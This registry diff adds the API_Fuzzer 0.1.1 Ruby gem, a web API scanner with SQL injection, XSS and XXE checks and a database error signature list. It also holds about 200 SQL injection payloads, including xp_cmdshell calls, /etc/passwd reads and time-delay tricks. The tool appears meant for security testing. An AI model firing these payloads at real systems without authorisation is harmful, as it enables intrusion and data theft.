API_Fuzzer 0.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,156 @@
1
+ require 'API_Fuzzer/vulnerability'
2
+ require 'API_Fuzzer/error'
3
+ require 'API_Fuzzer/request'
4
+
5
+ module API_Fuzzer
6
+ class InvalidURLError < StandardError; end
7
+
8
+ class SqlCheck
9
+ attr_accessor :parameters
10
+ attr_accessor :payloads, :sql_errors
11
+
12
+ ALLOWED_METHODS = [:get, :post].freeze
13
+ PAYLOAD_PATH = File.expand_path('../../../payloads/sql.txt', __FILE__)
14
+ DETECT_PATH = File.expand_path('../../../payloads/detect/sql.txt', __FILE__)
15
+
16
+ def self.scan(options = {})
17
+ @payloads = []
18
+ @sql_errors = []
19
+ fetch_payloads
20
+ @url = options[:url] || nil
21
+ raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
22
+ @params = options[:params] || {}
23
+ @cookies = options[:cookies] || {}
24
+ @json = options[:json] || false
25
+ @headers = options[:headers] || {}
26
+ @vulnerabilities = []
27
+
28
+ fuzz_payloads
29
+ return @vulnerabilities.uniq { |vuln| vuln.description }
30
+ rescue HTTP::ConnectionError => e
31
+ sleep(5)
32
+ fuzz_payloads
33
+ return @vulnerabilities.uniq { |vuln| vuln.description }
34
+ end
35
+
36
+ def self.fuzz_payloads
37
+ @payloads.each do |payload|
38
+ fuzz_each_payload(payload)
39
+ end
40
+ end
41
+
42
+ def self.fuzz_each_payload(payload)
43
+ uri = URI(@url)
44
+ path = uri.path
45
+ query = uri.query
46
+ base_uri = query.nil? ? path : [path, query].join("?")
47
+ fragments = base_uri.split(/[\/,?,&]/) - ['']
48
+ fragments.each do |fragment|
49
+ if fragment.match(/\A(\w)+=(\w)*\z/)
50
+ url = @url.gsub(fragment, [fragment, payload].join('')).chomp
51
+ fuzz_each_fragment(url, payload)
52
+ else
53
+ url = @url.gsub(fragment, payload).chomp
54
+ fuzz_each_fragment(url, payload)
55
+ end
56
+ end
57
+
58
+ return if @params.empty?
59
+
60
+ @params.keys.each do |parameter|
61
+ fuzz_each_parameter(parameter, payload)
62
+ end
63
+ end
64
+
65
+ def self.fuzz_each_fragment(url, payload)
66
+ ALLOWED_METHODS.each do |method|
67
+ begin
68
+ response = API_Fuzzer::Request.send_api_request(
69
+ url: url,
70
+ method: method,
71
+ cookies: @cookies,
72
+ headers: @headers
73
+ )
74
+
75
+ @vulnerabilities << API_Fuzzer::Error.new(description: "#{method} #{@url}", status: response.status, value: response.body) unless success?(response)
76
+ body = ''
77
+ if response_json?(response)
78
+ body = JSON.parse(response.body)
79
+ else
80
+ body = response.body
81
+ end
82
+
83
+ vulnerable = check_response?(body.to_s.downcase, payload)
84
+ next unless vulnerable
85
+ @vulnerabilities << API_Fuzzer::Vulnerability.new(
86
+ description: "Possible SQL injection in #{method} #{@url}",
87
+ parameter: "URL: #{url}",
88
+ value: "[PAYLOAD] #{payload}",
89
+ type: 'HIGH'
90
+ )
91
+ rescue Exception => e
92
+ puts e.message
93
+ end
94
+ end
95
+ end
96
+
97
+ def self.fuzz_each_parameter(parameter, payload)
98
+ @params[parameter] = payload
99
+ ALLOWED_METHODS.each do |method|
100
+ begin
101
+ response = API_Fuzzer::Request.send_api_request(
102
+ url: @url,
103
+ params: @params,
104
+ method: method,
105
+ cookies: @cookies,
106
+ headers: @headers
107
+ )
108
+
109
+ @vulnerabilities << API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body) unless success?(response)
110
+ body = response.body.to_s.downcase
111
+ vulnerable = check_response?(body, payload)
112
+ next unless vulnerable
113
+
114
+ @vulnerabilities << API_Fuzzer::Vulnerability.new(
115
+ description: "Possible SQL injection in #{method} #{@url} parameter: #{parameter}",
116
+ parameter: "parameter: #{@parameter}",
117
+ value: "[PAYLOAD] #{payload}",
118
+ type: 'HIGH'
119
+ )
120
+ rescue Exception => e
121
+ puts e.message
122
+ end
123
+ end
124
+ end
125
+
126
+ def self.check_response?(body, payload)
127
+ @sql_errors.each do |error|
128
+ if body.match(error.chomp)
129
+ puts error
130
+ return true
131
+ end
132
+ end
133
+ false
134
+ end
135
+
136
+ def self.success?(response)
137
+ response.code == 200
138
+ end
139
+
140
+ def self.response_json?(response)
141
+ response && response.headers['Content-Type'] && response.headers['Content-Type'].downcase =~ /application\/json/
142
+ end
143
+
144
+ def self.fetch_payloads
145
+ file = File.expand_path(PAYLOAD_PATH, __FILE__)
146
+ File.readlines(file).each do |line|
147
+ @payloads << line
148
+ end
149
+
150
+ file = File.expand_path(DETECT_PATH, __FILE__)
151
+ File.readlines(file).each do |line|
152
+ @sql_errors << line.downcase
153
+ end
154
+ end
155
+ end
156
+ end
@@ -0,0 +1,3 @@
1
+ module APIFuzzer
2
+ VERSION = "0.1.1".freeze
3
+ end
@@ -0,0 +1,14 @@
1
+ module API_Fuzzer
2
+
3
+ class Vulnerability
4
+ attr_accessor :description, :value, :type, :parameter
5
+
6
+ def initialize(options = {})
7
+ @description = options[:description]
8
+ @parameter = options[:parameter]
9
+ @value = options[:value]
10
+ @type = options[:type]
11
+ end
12
+ end
13
+
14
+ end
@@ -0,0 +1,92 @@
1
+ require 'API_Fuzzer/vulnerability'
2
+ require 'API_Fuzzer/error'
3
+ require 'API_Fuzzer/request'
4
+
5
+ module API_Fuzzer
6
+
7
+ class InvalidURLError < StandardError; end
8
+
9
+ class XssCheck
10
+ attr_accessor :parameters
11
+
12
+ ALLOWED_METHODS = [:get, :post].freeze
13
+ PAYLOADS = []
14
+ PAYLOAD_PATH = File.expand_path('../../../payloads/xss.txt', __FILE__)
15
+
16
+ def self.scan(options = {})
17
+ @url = options[:url] || nil
18
+ raise InvalidURLError, "[ERROR] URL missing in argument" unless @url
19
+ @params = options[:params] || {}
20
+ @cookies = options[:cookies] || {}
21
+ @headers = options[:headers] || {}
22
+ @json = options[:json] || false
23
+ @vulnerabilities = []
24
+
25
+ fetch_payloads
26
+ PAYLOADS.each do |payload|
27
+ fuzz_each_payload(payload)
28
+ end
29
+ @vulnerabilities.uniq { |vuln| vuln.description }
30
+ end
31
+
32
+ private
33
+
34
+ def self.fuzz_each_payload(payload)
35
+ @params.keys.each do |parameter|
36
+ fuzz_each_parameter(parameter, payload)
37
+ end
38
+ end
39
+
40
+ def self.fuzz_each_parameter(parameter, payload)
41
+ @params[parameter] = payload
42
+
43
+ ALLOWED_METHODS.each do |method|
44
+ response = API_Fuzzer::Request.send_api_request(
45
+ url: @url,
46
+ params: @params,
47
+ method: method,
48
+ cookies: @cookies,
49
+ headers: @headers
50
+ )
51
+
52
+ if response_json?(response)
53
+ body = JSON.parse(response.body)
54
+ else
55
+ vulnerable = check_response?(response.body, payload)
56
+
57
+ if success?(response)
58
+ @vulnerabilities << API_Fuzzer::Vulnerability.new(
59
+ description: "Possible XSS in #{method} #{@url} parameter: #{@parameter}",
60
+ value: "[PAYLOAD] #{payload}",
61
+ type: 'MEDIUM'
62
+ ) if vulnerable
63
+ else
64
+ API_Fuzzer::Error.new(description: "[ERROR] #{method} #{@url}", status: response.status, value: response.body)
65
+ end
66
+ end
67
+ end
68
+ end
69
+
70
+ def self.check_response?(body, payload)
71
+ if body.to_s.include?(payload)
72
+ return true
73
+ end
74
+ false
75
+ end
76
+
77
+ def self.success?(response)
78
+ response.code == 200
79
+ end
80
+
81
+ def self.response_json?(response)
82
+ response && response.headers['Content-Type'].downcase =~ /application\/json/
83
+ end
84
+
85
+ def self.fetch_payloads
86
+ file = File.expand_path(PAYLOAD_PATH, __FILE__)
87
+ File.readlines(file).each do |line|
88
+ PAYLOADS << line
89
+ end
90
+ end
91
+ end
92
+ end
@@ -0,0 +1,47 @@
1
+ require 'API_Fuzzer/vulnerability'
2
+ require 'API_Fuzzer/error'
3
+ require 'API_Fuzzer/request'
4
+
5
+ module API_Fuzzer
6
+ class XxeCheck
7
+
8
+ def self.scan(options = {})
9
+ @url = options[:url] || nil
10
+ @params = options[:params]
11
+ @scan_hash = options[:scan]
12
+ @cookies = options[:cookies] || {}
13
+ @headers = options[:headers] || {}
14
+ fuzz_xml_params
15
+ end
16
+
17
+ private
18
+
19
+ def self.fuzz_xml_params
20
+ return unless @params
21
+ body = params_serialize.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
22
+ payload = <<-XXEPAYLOAD
23
+ <?xml version="1.0" encoding="ISO-8859-1"?>
24
+ <!DOCTYPE foo [
25
+ <!ELEMENT foo ANY >
26
+ <!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
27
+ XXEPAYLOAD
28
+ payload << body
29
+ API_Fuzzer::Request.send_api_request(
30
+ url: @url,
31
+ params: payload,
32
+ body: true,
33
+ method: :post,
34
+ headers: @headers,
35
+ cookies: @cookies
36
+ )
37
+ end
38
+
39
+ def self.params_serialize
40
+ body = []
41
+ @params.keys.each do |key, value|
42
+ body << "#{key}=#{value}"
43
+ end
44
+ body.join('&')
45
+ end
46
+ end
47
+ end
@@ -0,0 +1,3 @@
1
+ sleep(__TIME__)#
2
+ hi' or sleep(__TIME__)--+
3
+
@@ -0,0 +1,89 @@
1
+ &lt;/font&gt;&lt;font face="Arial" size=2&gt;
2
+ A syntax error has occurred
3
+ ADODB.Field error
4
+ ASP.NET is configured to show verbose error messages
5
+ ASP.NET_SessionId
6
+ Active Server Pages error
7
+ An illegal character has been found in the statement
8
+ An unexpected token "END-OF-STATEMENT" was found
9
+ CLI Driver
10
+ Can't connect to local
11
+ Custom Error Message
12
+ DB2 Driver
13
+ DB2 Error
14
+ DB2 ODBC
15
+ Died at
16
+ Disallowed Parent Path
17
+ Error Diagnostic Information
18
+ Error Message : Error loading required libraries.
19
+ Error Report
20
+ Error converting data type varchar to numeric
21
+ Fatal error
22
+ Incorrect syntax near
23
+ Index of
24
+ Internal Server Error
25
+ Invalid Path Character
26
+ Invalid procedure call or argument
27
+ Invision Power Board Database Error
28
+ JDBC Driver
29
+ JDBC Error
30
+ JDBC MySQL
31
+ JDBC Oracle
32
+ JDBC SQL
33
+ Microsoft OLE DB Provider for ODBC Drivers
34
+ Microsoft VBScript compilation error
35
+ Microsoft VBScript error
36
+ MySQL Driver
37
+ MySQL Error
38
+ MySQL ODBC
39
+ ODBC DB2
40
+ ODBC Driver
41
+ ODBC Error
42
+ ODBC Microsoft Access
43
+ ODBC Oracle
44
+ ODBC SQL
45
+ ODBC SQL Server
46
+ OLE/DB provider returned message
47
+ ORA-0
48
+ ORA-1
49
+ Oracle DB2
50
+ Oracle Driver
51
+ Oracle Error
52
+ Oracle ODBC
53
+ PHP Error
54
+ PHP Parse error
55
+ PHP Warning
56
+ Parent Directory
57
+ Permission denied: 'GetObject'
58
+ PostgreSQL query failed: ERROR: parser: parse error
59
+ SQL Server Driver
60
+ SQL Server
61
+ SQL command not properly ended
62
+ SQLException
63
+ Supplied argument is not a valid PostgreSQL result
64
+ Syntax error in query expression
65
+ The error occurred in
66
+ The script whose uid is
67
+ Type mismatch
68
+ Unable to jump to row
69
+ Unclosed quotation mark before the character string
70
+ Unterminated string constant
71
+ Warning: Cannot modify header information - headers already sent
72
+ Warning: Supplied argument is not a valid File-Handle resource in
73
+ Warning: mysql_query()
74
+ Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL
75
+ You have an error in your SQL syntax near
76
+ data source=
77
+ detected an internal error [IBM][CLI Driver][DB2/6000]
78
+ include_path
79
+ invalid query
80
+ is not allowed to access
81
+ mySQL error with query
82
+ mysql error
83
+ on MySQL result index
84
+ server object error
85
+ supplied argument is not a valid MySQL result resource
86
+ unexpected end of SQL command
87
+ MySQL server version
88
+ You have an error in your SQL syntax
89
+ SQL syntax
@@ -0,0 +1,196 @@
1
+ '
2
+ ' --
3
+ (
4
+ )
5
+ *|
6
+ */*
7
+ &
8
+ 0
9
+ 031003000270000
10
+ 0 or 1=1
11
+ 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
12
+ 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
13
+ 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
14
+ 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
15
+ 1 or 1=1
16
+ 1;SELECT%20*
17
+ 1 waitfor delay '0:0:10'--
18
+ '%20or%20''='
19
+ '%20or%201=1
20
+ ')%20or%20('x'='x
21
+ '%20or%20'x'='x
22
+ %20or%20x=x
23
+ %20'sleep%2050'
24
+ %20$(sleep%2050)
25
+ %21
26
+ 23 OR 1=1
27
+ hi' or '1'='1'--
28
+ %26
29
+ %27%20or%201=1
30
+ %28
31
+ %29
32
+ %2A%28%7C%28mail%3D%2A%29%29
33
+ %2A%28%7C%28objectclass%3D%2A%29%29
34
+ %2A%7C
35
+ ||6
36
+ '||'6
37
+ (||6)
38
+ %7C
39
+ a'
40
+ admin' or '
41
+ ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
42
+ ' and 1 in (select var from temp)--
43
+ anything' OR 'x'='x
44
+ "a"" or 1=1--"
45
+ a' or 1=1--
46
+ "a"" or 3=3--"
47
+ a' or 3=3--
48
+ a' or 'a' = 'a
49
+ &apos;%20OR
50
+ as
51
+ asc
52
+ a' waitfor delay '0:0:10'--
53
+ '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
54
+ bfilename
55
+ char%4039%41%2b%40SELECT
56
+ declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
57
+ declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
58
+ declare @q nvarchar (4000) select @q =
59
+ declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
60
+ declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
61
+ declare @s varchar(22) select @s =
62
+ declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
63
+ delete
64
+ desc
65
+ distinct
66
+ '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
67
+ '; exec master..xp_cmdshell
68
+ '; exec master..xp_cmdshell 'ping 172.10.1.255'--
69
+ exec(@s)
70
+ '; exec ('sel' + 'ect us' + 'er')
71
+ exec sp
72
+ '; execute immediate 'sel' || 'ect us' || 'er'
73
+ exec xp
74
+ '; exec xp_regread
75
+ ' group by userid having 1=1--
76
+ handler
77
+ having
78
+ ' having 1=1--
79
+ hi or 1=1 --"
80
+ hi' or 1=1 --
81
+ "hi"") or (""a""=""a"
82
+ hi or a=a
83
+ hi' or 'a'='a
84
+ hi') or ('a'='a
85
+ 'hi' or 'x'='x';
86
+ insert
87
+ like
88
+ limit
89
+ *(|(mail=*))
90
+ *(|(objectclass=*))
91
+ or
92
+ ' or ''='
93
+ or 0=0 #"
94
+ ' or 0=0 --
95
+ ' or 0=0 #
96
+ " or 0=0 --
97
+ or 0=0 --
98
+ or 0=0 #
99
+ ' or 1 --'
100
+ ' or 1/*
101
+ ; or '1'='1'
102
+ ' or '1'='1
103
+ ' or '1'='1'--
104
+ ' or 1=1
105
+ ' or 1=1 /*
106
+ ' or 1=1--
107
+ ' or 1=1--
108
+ '/**/or/**/1/**/=/**/1
109
+ ‘ or 1=1 --
110
+ " or 1=1--
111
+ or 1=1
112
+ or 1=1--
113
+ or 1=1 or ""=
114
+ ' or 1=1 or ''='
115
+ ' or 1 in (select @@version)--
116
+ or%201=1
117
+ or%201=1 --
118
+ ' or 2 > 1
119
+ ' or 2 between 1 and 3
120
+ ' or 3=3
121
+ ‘ or 3=3 --
122
+ ' or '7659'='7659
123
+ or a=a
124
+ or a = a
125
+ ' or 'a'='a
126
+ ' or a=a--
127
+ ') or ('a'='a
128
+ " or "a"="a
129
+ ) or (a=a
130
+ order by
131
+ ' or (EXISTS)
132
+ or isNULL(1/0) /*
133
+ " or isNULL(1/0) /*
134
+ ' or 'something' like 'some%'
135
+ ' or 'something' = 'some'+'thing'
136
+ ' or 'text' = n'text'
137
+ ' or 'text' > 't'
138
+ ' or uid like '%
139
+ ' or uname like '%
140
+ ' or 'unusual' = 'unusual'
141
+ ' or userid like '%
142
+ ' or user like '%
143
+ ' or username like '%
144
+ ' or username like char(37);
145
+ ' or 'whatever' in ('whatever')
146
+ ' -- &password=
147
+ password:*/=1--
148
+ PRINT
149
+ PRINT @@variable
150
+ procedure
151
+ replace
152
+ select
153
+ ' select * from information_schema.tables--
154
+ ' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
155
+ ' (select top 1
156
+ --sp_password
157
+ 'sqlattempt1
158
+ (sqlattempt2)
159
+ 'sqlvuln
160
+ '+sqlvuln
161
+ (sqlvuln)
162
+ sqlvuln;
163
+ t'exec master..xp_cmdshell 'nslookup www.google.com'--
164
+ to_timestamp_tz
165
+ truncate
166
+ tz_offset
167
+ ' UNION ALL SELECT
168
+ ' union all select @@version--
169
+ ' union select
170
+ uni/**/on sel/**/ect
171
+ ' UNION SELECT
172
+ ' union select 1,load_file('/etc/passwd'),1,1,1;
173
+ ) union select * from information_schema.tables;
174
+ ' union select * from users where login = char(114,111,111,116);
175
+ update
176
+ '||UTL_HTTP.REQUEST
177
+ ,@variable
178
+ @variable
179
+ @var select @var as var into temp end --
180
+ \x27UNION SELECT
181
+ x' AND 1=(SELECT COUNT(*) FROM tabname); --
182
+ x' AND email IS NULL; --
183
+ x' AND members.email IS NULL; --
184
+ x' AND userid IS NULL; --
185
+ x' or 1=1 or 'x'='y
186
+ x' OR full_name LIKE '%Bob%
187
+ ý or 1=1 --
188
+ 1'1
189
+ 1 exec sp_ (or exec xp_)
190
+ 1 and 1=1
191
+ 1' and 1=(select count(*) from tablenames); --
192
+ 1 or 1=1
193
+ 1' or '1'='1
194
+ 1or1=1
195
+ 1'or'1'='1
196
+ fake@ema'or'il.nl'='il.nl